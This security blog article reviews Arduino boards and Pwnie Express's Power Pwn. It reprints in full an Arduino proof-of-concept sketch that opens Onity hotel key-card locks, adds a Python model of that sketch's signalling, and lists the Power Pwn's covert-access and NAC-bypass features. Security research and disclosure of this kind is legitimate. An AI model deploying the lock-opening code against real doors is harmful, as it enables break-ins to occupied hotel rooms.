
Handy Devices Revolution : Handy Pentesting and Hacking Part II

December 7, 2012 by Jay Turla

Hello guys, this is my second article about Handy Devices Revolution: Handy Pentesting and Hacking. The first article can be found here: https://resources.infosecinstitute.com/handy-devices-hacking-part-1/
In this article, we will be focusing on the Arduino microcontroller and a power plug-based product from Pwnie Express, as promised in the last part of my first article.

Arduino

Arduino is a well-known piece of open source electronics hardware and a good board for learning microcontrollers and for building up your basic electronics knowledge, even if you have no experience in this area. Nowadays it is used by artists, designers, hobbyists, electronics enthusiasts, hackers, geeks, and programmers to develop applications with the Arduino programming language and the Arduino development environment, which is based on Processing. Applications range from basic digital input and output, through serial communication, to driving LCD and GSM shields. You flash the Arduino board with the open source Arduino IDE (Integrated Development Environment), which runs on Mac OS X, Linux, and Windows.

Arduino boards can be purchased from various distributors all over the world. In fact, there are also Arduino clones from electronics stores and institutions, such as the Gizduino from e-Gizmo and the ACEduino 328 from Alexan Commercial.

My very own ACEduino 328

If you do not have an Arduino board, you can build your own board if you are into electronics by following this tutorial, which includes the schematic diagram, mounting diagram, files, and the manual.

With the power of this board, you can unleash your creativity and build applications such as motor sensors, fire alarms, wireless speakers, chat servers, web servers, a simple keyboard, sequencing lights, motor controllers, voice changers, signal blockers or jammers, and many others (more projects can be found at hackaday). Totally bad ass, right?

Here is the sketch for a simple project I made using just three LEDs, a breadboard, and an ACEduino 328 board to make sequencing lights, cross-posted from my girlfriend's blog:

  int led1 = 13; // 1st LED connected to pin 13
  int led2 = 12; // 2nd LED connected to pin 12
  int led3 = 11; // 3rd LED connected to pin 11

  void setup()
  {
    // setting the three digital pins as outputs
    pinMode(led1, OUTPUT);
    pinMode(led2, OUTPUT);
    pinMode(led3, OUTPUT);
  }

  void loop()
  {
    digitalWrite(led1, HIGH); // turns the LED on
    delay(100);               // waiting time = 100 milliseconds
    digitalWrite(led1, LOW);  // turns the LED off
    delay(100);

    digitalWrite(led2, HIGH);
    delay(100);
    digitalWrite(led2, LOW);
    delay(100);

    digitalWrite(led3, HIGH);
    delay(100);
    digitalWrite(led3, LOW);
    delay(100);
  }

A simple sketch to understand, right? I wrote it to show how to turn your board into a simple Christmas light project, since it's December.

By the way, did you know that a hacker demonstrated, at the Black Hat 2012 security conference in Las Vegas, a way to open the Onity programmable key card locks installed on some four million hotel room doors using just an Arduino microcontroller? The man behind it is none other than Cody Brocious, one of Mozilla's software developers.

Cody Brocious reverse-engineered the Onity locks and their security measures (or maybe I should say "flaws"). He then took his Arduino Mega 128 and uploaded a sketch that talks to the lock's port and unlocks it. Below is the Arduino sketch from his proof-of-concept (PoC) paper:

  // Sketch from Brocious's PoC paper. Bit patterns and timings are his;
  // the comments, the volatile on bval and the >= in the timeout check
  // are editorial additions.

  #define CONSERVATIVE

  int ioPin = 3;

  #define BUFSIZE 200
  unsigned char buf[BUFSIZE];

  // The line is driven open-drain: open() writes ioPin LOW once, so
  // switching the pin to OUTPUT pulls the line low and switching it back
  // to INPUT releases it.
  #define pullLow() pinMode(ioPin, OUTPUT)
  #define pullHigh() pinMode(ioPin, INPUT)

  // Bits sent to the lock first (see open() for the pulse encoding).
  unsigned char dbits[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0};

  // Eleven 144-bit frames sent after the lock answers. Entries not listed
  // in an initializer are zero-filled by the compiler. Bits 50..84 and
  // 86..93 of the first frame are overwritten in open() with data read
  // back from the lock.
  unsigned char bits[][144] = {
    {
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      1, 0, 1, 0, 0, 0, 1, 0,
      0, 1,
      1, 0, 0, 0, 1, 0, 0, 0, 1,
      1, 0, 1, 0, 0, 1, 0, 1, 1,
      1, 1, 0, 0, 0, 0, 1, 1, 1,
      0, 0, 0, 1, 1, 1, 0, 1, 1,
      1, 1, 1, 1, 1, 1, 1, 1,
      0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0
    },
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0},
    {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0}
  };

  // Set from the interrupt handler, so it must be volatile or the compiler
  // may cache the value in the read loop below.
  volatile unsigned char bval;

  void wentLow() {
    bval = 1;
  }

  void setup() {
  }

  bool open() {
    pinMode(ioPin, OUTPUT);
    digitalWrite(ioPin, LOW);
    pinMode(ioPin, INPUT);
    digitalWrite(ioPin, LOW);

    // Send dbits. Every symbol starts with a 16 us low pulse; a 0 is one
    // pulse followed by 190 us released, a 1 is two pulses with 56 us and
    // 112 us released gaps.
    for(int i = 0; i < sizeof(dbits); ++i) {
      if(dbits[i] == 0) {
        pullLow();
        delayMicroseconds(16);
        pullHigh();
        delayMicroseconds(190);
      } else {
        pullLow();
        delayMicroseconds(16);
        pullHigh();
        delayMicroseconds(56);
        pullLow();
        delayMicroseconds(16);
        pullHigh();
        delayMicroseconds(112);
      }
    }
    // Trailing end-of-frame pulse.
    pullLow();
    delayMicroseconds(16);
    pullHigh();

    // Wait for the lock to pull the line low; give up if it never does.
    // External interrupt 1 is pin 3 on the Uno and Mega, matching ioPin.
    bval = 0;
    attachInterrupt(1, wentLow, FALLING);
    unsigned int i = 0;
    while(digitalRead(ioPin) == HIGH && i++ < 32767) {}
    if(i >= 32767)   // the post-increment leaves i at 32768 on timeout
      return false;
    delayMicroseconds(20);

    // Clock 164 bits back from the lock: an 8 us pulse, then the bit is 1
    // if the lock pulls the line low within the following 184 us.
    for(int i = 0; i < 164; ++i) {
      buf[i] = 0;
      pullLow();
      delayMicroseconds(8);
      pullHigh();
      bval = 0;
      delayMicroseconds(184);
      buf[i] = bval;
    }

    // Copy 35 of the received bits into the first frame and derive its
    // eight check bits from the four 8-bit fields (stride 9) of that copy.
    for(int i = 0; i < 32+3; ++i)
      bits[0][50+i] = buf[22+i];
    for(int i = 0; i < 8; ++i)
      bits[0][86+i] = bits[0][50+i] ^ bits[0][50+9+i] ^ bits[0][50+18+i] ^ bits[0][50+27+i];
    bits[0][86] ^= 1;
    bits[0][87] ^= 0;
    bits[0][88] ^= 1;
    bits[0][89] ^= 1;
    bits[0][90] ^= 1;
    bits[0][91] ^= 0;
    bits[0][92] ^= 1;
    bits[0][93] ^= 1;

  #ifdef CONSERVATIVE
    delay(100);
  #endif

    // Send the eleven frames with the same pulse encoding as dbits.
    for(int j = 0; j < 11; ++j) {
      for(int i = 0; i < sizeof(bits[j]); ++i) {
        if(bits[j][i] == 0) {
          pullLow();
          delayMicroseconds(16);
          pullHigh();
          delayMicroseconds(190);
        } else {
          pullLow();
          delayMicroseconds(16);
          pullHigh();
          delayMicroseconds(56);
          pullLow();
          delayMicroseconds(16);
          pullHigh();
          delayMicroseconds(112);
        }
      }
  #ifdef CONSERVATIVE
      delayMicroseconds(2700);
  #else
      delayMicroseconds(500);
  #endif
    }
    return true;
  }

  void loop() {
    open();
  }
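To make the sketch's signalling easier to reason about away from the hardware, here is an added example (my own code, not Brocious's sketch or anything from Onity) that models the line encoding the sketch uses: every symbol starts with a 16 µs low pulse; a 0 is followed by a 190 µs released gap, a 1 by a 56 µs gap, a second pulse and a 112 µs gap. It encodes a list of bits into a (level, duration) waveform, decodes such a waveform back with a tolerance for timing jitter, and reproduces the eight check bits the sketch derives from the 35 reply bits it copies. The timings and the XOR constant are read off the sketch; the waveform format, the 25% tolerance and the sample bits are assumptions constructed for illustration.

```python
"""Host-side model of the wire encoding used by the Onity sketch above.

Added example, not part of Brocious's paper or sketch. Timing constants
come from the sketch's delayMicroseconds() calls; the waveform format and
the tolerance are assumptions for illustration only.
"""
from typing import List, Sequence, Tuple

# Microsecond timings taken from the sketch.
PULSE_LOW_US = 16   # every symbol starts with the line driven low for 16 us
ZERO_GAP_US = 190   # a 0: one pulse, then released for 190 us
ONE_GAP1_US = 56    # a 1: first pulse, released 56 us,
ONE_GAP2_US = 112   #      second pulse, released 112 us

# The sketch XORs the four 8-bit fields (stride 9) of the 35 reply bits it
# copied, then XORs in this constant (bits[0][86..93] ^= 1,0,1,1,1,0,1,1).
CHECK_XOR_CONST = [1, 0, 1, 1, 1, 0, 1, 1]

# A waveform is a list of (level, duration_us) segments: level 0 = driven
# low, level 1 = released. Assumed shape of a logic-analyser export after
# edge detection.
Segment = Tuple[int, int]


def encode_bits(bits: Sequence[int], terminate: bool = True) -> List[Segment]:
    """Render bits the way open() in the sketch drives ioPin."""
    wave: List[Segment] = []
    for b in bits:
        if b == 0:
            wave += [(0, PULSE_LOW_US), (1, ZERO_GAP_US)]
        elif b == 1:
            wave += [(0, PULSE_LOW_US), (1, ONE_GAP1_US),
                     (0, PULSE_LOW_US), (1, ONE_GAP2_US)]
        else:
            raise ValueError(f"bit must be 0 or 1, got {b!r}")
    if terminate:
        # after its bit loop the sketch sends one more 16 us pulse and
        # leaves the line released
        wave.append((0, PULSE_LOW_US))
    return wave


def _near(value: int, target: int, tolerance: float) -> bool:
    return abs(value - target) <= target * tolerance


def decode_wave(wave: Sequence[Segment], tolerance: float = 0.25) -> List[int]:
    """Recover bits by classifying the released gap after each 16 us pulse.

    Anything that does not fit the three gap lengths raises ValueError, so a
    bad capture fails loudly instead of yielding plausible-looking bits.
    """
    bits: List[int] = []
    i, n = 0, len(wave)
    while i < n:
        level, dur = wave[i]
        if level != 0 or not _near(dur, PULSE_LOW_US, tolerance):
            raise ValueError(f"segment {i}: expected a {PULSE_LOW_US} us low pulse, got {wave[i]}")
        if i + 1 == n:
            break  # lone trailing pulse: the sketch's end-of-frame marker
        glevel, gap = wave[i + 1]
        if glevel != 1:
            raise ValueError(f"segment {i + 1}: expected the line to be released")
        if _near(gap, ZERO_GAP_US, tolerance):
            bits.append(0)
            i += 2
        elif _near(gap, ONE_GAP1_US, tolerance):
            # first half of a 1: a second pulse with a ~112 us gap must follow
            if (i + 3 >= n or wave[i + 2][0] != 0
                    or not _near(wave[i + 2][1], PULSE_LOW_US, tolerance)
                    or wave[i + 3][0] != 1
                    or not _near(wave[i + 3][1], ONE_GAP2_US, tolerance)):
                raise ValueError(f"segment {i}: 56 us gap not followed by the second pulse of a 1")
            bits.append(1)
            i += 4
        else:
            raise ValueError(f"segment {i + 1}: unrecognised gap of {gap} us")
    return bits


def derive_check_bits(field35: Sequence[int]) -> List[int]:
    """Reproduce the eight check bits (bits[0][86..93]) the sketch computes
    from the 35 reply bits it copied into bits[0][50..84]."""
    if len(field35) != 35:
        raise ValueError("the sketch copies exactly 32+3 bits")
    return [field35[i] ^ field35[9 + i] ^ field35[18 + i] ^ field35[27 + i] ^ CHECK_XOR_CONST[i]
            for i in range(8)]


if __name__ == "__main__":
    sample = [0, 1, 1, 0, 1, 0, 0, 1]   # constructed sample, not a real capture
    print("round trip:", decode_wave(encode_bits(sample)) == sample)
    print("check bits for an all-zero field:", derive_check_bits([0] * 35))
```

The decoder keys on gap length only, which is why the 25% tolerance is safe here: the three nominal gaps (56, 112, 190 µs) stay non-overlapping under it, so jitter of a few microseconds from a cheap analyser still decodes cleanly while a gap that fits none of them is rejected rather than guessed. The read side of the sketch (8 µs pulses, a 1 meaning the lock pulled the line low within 184 µs) is a different scheme and is not modelled.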

A brilliant idea indeed, because he used a very handy device to break into the locks. So what's next? Safes, deposit boxes, and other electronic locks? Quite possibly! You just don't mess with the power of Arduino. Here are two projects from Thomas Cannon's website to keep yourself busy with:

http://thomascannon.net/projects/hacking-challenge/

http://thomascannon.net/projects/dlp-bypass/

Power Pwn

(Images courtesy of Pwnie Express)

The device that you see in the image above may look like an ordinary power strip or extension cord, but it is more than that: it runs Debian Linux and is actually a penetration testing platform from Pwnie Express.

Here are its capabilities, specifications and functionalities as described by the product’s official website:

– Onboard high-gain 802.11b/g/n wireless

– Onboard high-gain Bluetooth (up to 1000′)

– Onboard dual-Ethernet

– Fully functional 120/240v AC outlets!

– Includes 16GB internal disk storage

– Includes external unlocked 4G/GSM adapter

– Fully-automated NAC/802.1x/RADIUS bypass!

– Out-of-band SSH access over 4G/GSM cell networks!

– Text-to-Bash: text in bash commands via SMS!

– Simple web-based administration with “Plug UI”

– One-click Evil AP, stealth mode, & passive recon

– Maintains persistent, covert, encrypted SSH access to your target network

– Tunnels through application-aware firewalls & IPS

– Supports HTTP proxies, SSH-VPN, & OpenVPN

– Sends email/SMS alerts when SSH tunnels are activated

– Preloaded with Debian 6, Metasploit, SET, Fast-Track, w3af, Kismet, Aircrack, SSLstrip, nmap, Hydra, dsniff, Scapy, Ettercap, Bluetooth/VoIP/IPv6 tools, and more.

– Unpingable and no listening ports in stealth mode

– Compatible with SIM cards from AT&T, T-mobile, Vodafone, Orange, and GSM carriers in over 160 countries

– HSDPA/UMTS (850/1700/1900/2100MHz)

– GSM/GPRS/EDGE (850/900/1800/1900MHz)

– SIM card not included

An awesome penetration testing device in a power strip's form factor!

Final Words for Part Two

We were able to review two handy devices in this article, but this is not the end of the Handy Devices Revolution: Handy Pentesting and Hacking series. The reason I included only two is that I'm reserving some more surprises for the third one, so just stay tuned, guys ...

Resources:

http://gerthyjo.blogspot.com/2012/11/getting-started-with-aceduino-328-in.html

http://arduino.cc/

http://www.extremetech.com/computing/133448-black-hat-hacker-gains-access-to-4-million-hotel-rooms-with-arduino-microcontroller

http://demoseen.com/bhpaper.html

Jay Turla

Jay Turla is a security consultant. He is interested in Linux, OpenVMS, penetration testing, tools development and vulnerability assessment. He is one of the goons of ROOTCON (Philippine Hackers Conference). You can follow his tweets @shipcod3.